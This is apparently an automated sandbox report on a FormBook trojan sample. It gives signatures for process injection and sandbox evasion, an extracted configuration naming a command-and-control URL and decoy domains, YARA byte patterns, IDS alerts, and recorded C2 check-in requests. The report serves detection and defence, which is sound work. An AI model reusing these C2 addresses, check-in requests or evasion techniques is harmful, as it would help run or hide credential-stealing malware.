Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report lTAPQJikGw

Overview

General Information

Sample Name:lTAPQJikGw (renamed file extension from none to exe)
Analysis ID:432746
MD5:16657fa097cd334973a5489eeff8bafe
SHA1:b6db5e9cc112155b7285f0a415cf4889ff1bf7ef
SHA256:2589143d02f6aef252b5b704f6b98723ae131d3279bcf36d57ee26318bc0741f
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lTAPQJikGw.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\lTAPQJikGw.exe' MD5: 16657FA097CD334973A5489EEFF8BAFE)
    • lTAPQJikGw.exe (PID: 6192 cmdline: C:\Users\user\Desktop\lTAPQJikGw.exe MD5: 16657FA097CD334973A5489EEFF8BAFE)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • control.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
        • cmd.exe (PID: 6952 cmdline: /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.lTAPQJikGw.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.lTAPQJikGw.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.lTAPQJikGw.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        2.0.lTAPQJikGw.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.lTAPQJikGw.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 10 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.cmannouncements.com/p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHSAvira URL Cloud: Label: malware
          Source: http://www.balloon-artists.com/p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHSAvira URL Cloud: Label: malware
          Source: http://www.boogerstv.com/p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHSAvira URL Cloud: Label: malware
          Source: http://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHSAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: lTAPQJikGw.exeVirustotal: Detection: 44%Perma Link
          Source: lTAPQJikGw.exeReversingLabs: Detection: 43%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: lTAPQJikGw.exeJoe Sandbox ML: detected
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: lTAPQJikGw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: lTAPQJikGw.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\xxwqcHkmba\src\obj\Debug\CryptoConfig.pdb source: lTAPQJikGw.exe
          Source: Binary string: control.pdb source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lTAPQJikGw.exe, control.exe
          Source: Binary string: control.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS HTTP/1.1Host: www.balloon-artists.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cmannouncements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cmannouncements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS HTTP/1.1Host: www.leonardocarrillo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS HTTP/1.1Host: www.dreamcashbuyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS HTTP/1.1Host: www.swayam-moj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS HTTP/1.1Host: www.defenestration.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS HTTP/1.1Host: www.boogerstv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&Pr980v=G2MtWNVHS HTTP/1.1Host: www.totally-seo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 147.255.162.204 147.255.162.204
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS HTTP/1.1Host: www.balloon-artists.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cmannouncements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cmannouncements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS HTTP/1.1Host: www.leonardocarrillo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS HTTP/1.1Host: www.dreamcashbuyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS HTTP/1.1Host: www.swayam-moj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS HTTP/1.1Host: www.defenestration.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS HTTP/1.1Host: www.boogerstv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&Pr980v=G2MtWNVHS HTTP/1.1Host: www.totally-seo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.balloon-artists.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Jun 2021 16:08:23 GMTServer: Apache/2.4.48 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: lTAPQJikGw.exe, 00000000.00000002.657793972.0000000003341000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000003.00000000.688234599.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
